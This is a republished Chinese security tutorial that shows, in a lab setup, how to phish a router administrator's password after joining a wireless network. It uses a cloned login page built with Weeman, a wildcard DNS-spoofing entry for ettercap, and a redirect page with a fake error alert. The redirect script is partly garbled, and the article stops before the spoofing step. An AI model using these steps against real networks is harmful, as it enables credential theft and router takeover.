來自i春秋作者:sn0w
本篇文章主要介紹如何在接入無線網絡后如何拿到路由器的管理權限,至于如何得到路由器連接密碼可以參考 WPA-PSK無線網絡的破解 ,本文只提供一個思路。我們大致的思路是通過weeman偽造登錄頁面,ettercap進行arp欺騙DNS劫持,從而讓管理員跳轉到我們的釣魚頁面,欺騙輸入管理密碼。
測試環境:
攻擊者: 192.168.0.101 kali linux 2016.1
目標管理員: 192.168.0.100 Windows 10
路由器管理地址: 192.168.0.1
首先我們需要生成一個偽造的登錄頁面,需要用到的工具為Weeman,關于這個的工具的介紹并不多,大家可以參考簡單易用的釣魚滲透測試工具Weeman新版發布。
1.設置偽造的目標地址:
set url [url]http://192.168.0.1/login.asp[/url]
2.設置端口號:
set port 8080
3.設置轉跳地址(登錄成功后的頁面):
set action_url [url]http://192.168.0.1/index.asp[/url]
通過簡單的配置就可以運行了
run

可以看到他已經Download了目標地址并放在了8080端口下,此時他會在在程序的根目錄下生成一個index.html文件,但是我們訪問后發現效果并不是很好。

其實這個腳本只是單純的將HTML代碼進行了緩存,并沒有對支持網頁的一些資源(CSS/JavaScript/圖片)進行緩存。為了讓我們的釣魚頁面更具有欺騙效果,我們對他進行一些簡單的優化,首先我們打開正常的登錄頁面 Ctrl + S 將整站進行保存

我們將下載的文件放在與index.html同目錄(weeman根目錄)下。注:此處我們可以還需要改一下index.html引入的路徑。 最終效果(時間原因并沒有加上所有圖片):

至此,我們第一步已經完成下面我們要上利器ettercap,在這之前我們先做一下簡單配置。 首先我們需要配置一下DNS文件,在etc/ettercap/etter.dns 內添加一行
* A 192.168.0.101
* 為通配符,這一行的意思為將所有的網站全部解析到192.168.0.101(攻擊者IP)。

然后我們開啟apache服務,讓攻擊者的電腦成為一個web服務器
service apache2 start

現在我們去做一個簡單的轉跳頁面放在apache的www目錄(var/www/html)下,通過這個轉跳頁面轉到我們的釣魚頁面,當然這個轉跳頁面也要具有一定的欺騙性。
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html>
<html>
??<head>
????<meta charset="utf-8">
????<title></title>
????<script type="text/javascript">
??????alert("網絡連接失敗,請嘗試重新配置路由器!");
??????location.;???? <!--釣魚界面-->
????</script>
??</head>
??<body>
?
??</body>
</html>
這段代碼可以實現,再打開這個后彈窗 “網絡連接失敗,請嘗試重新配置路由器!”,然后轉調至我們的釣魚頁面。 下面我們打開ettercap進行dns欺騙
..........................................................
文章較長,查看全文可點擊以下i春秋原文地址: http://bbs.ichunqiu.com/thread-10850-1-1.html?from=paper
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/28/
暫無評論